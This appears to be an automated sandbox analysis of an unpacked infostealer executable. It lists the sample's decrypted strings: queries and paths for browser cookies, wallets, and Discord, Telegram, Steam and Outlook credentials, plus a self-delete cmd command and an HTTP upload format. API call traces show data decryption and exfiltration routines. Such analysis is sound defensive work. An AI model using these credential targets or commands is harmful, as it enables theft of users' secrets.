Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: places.sqlite
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: plugins
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: IndexedDB
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Opera Stable
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: CURRENT
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Local State
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: profiles.ini
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: chrome
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: opera
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: firefox
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: wallets
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: ProductName
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: x32
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: x64
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: DisplayName
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Network Info:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: System Summary:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - HWID:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - OS:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Architecture:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - UserName:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Local Time:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - UTC:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Language:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Laptop:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Running Path:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - CPU:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Threads:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Cores:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - RAM:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: - GPU:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: User Agents:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: All Users:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Current User:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Process List:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: system_info.txt
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: nss3.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \Temp\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: .exe
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: runas
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: open
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: /c start
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: %RECENT%
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: *.lnk
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: files
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \discord\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: key_datas
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: map*
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Telegram
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Tox
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: *.tox
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: *.ini
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Password
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: 00000001
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: 00000002
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: 00000003
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: 00000004
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Pidgin
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \.purple\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: accounts.xml
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: token:
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: SteamPath
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \config\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: ssfn*
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: config.vdf
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \Steam\
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: done
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: soft
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: https
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: POST
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: hwid
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: build
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: token
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: file_name
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: file
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: message
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 1.2.1D71.tmp.exe.2470e67.1.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_00406000 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	1_2_00406000
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_00404B80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,	1_2_00404B80
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_00407690 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_00407690
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_00424090 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	1_2_00424090
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_00409BE0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	1_2_00409BE0
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_00409B80 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_00409B80
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02479E47 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	1_2_02479E47
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02476267 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	1_2_02476267
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02487260 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	1_2_02487260
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_024942F7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	1_2_024942F7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0247EFF7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,	1_2_0247EFF7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02487047 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,	1_2_02487047
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_024778F7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	1_2_024778F7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02474DE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,	1_2_02474DE7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02479DE7 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	1_2_02479DE7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\SEejSLAS9f.exe	Unpacked PE file: 0.2.SEejSLAS9f.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Unpacked PE file: 1.2.1D71.tmp.exe.400000.0.unpack

Source: SEejSLAS9f.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SEejSLAS9f.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02481EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_02481EA7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0248CF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_0248CF47
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02483F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_02483F27
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0247DFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_0247DFD7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02471807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	1_2_02471807
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02471820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	1_2_02471820
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_02481827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_02481827
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0248D8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	1_2_0248D8A7
Source: C:\Users\user\AppData\Local\Temp\1D71.tmp.exe	Code function: 1_2_0248E0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	1_2_0248E0B7
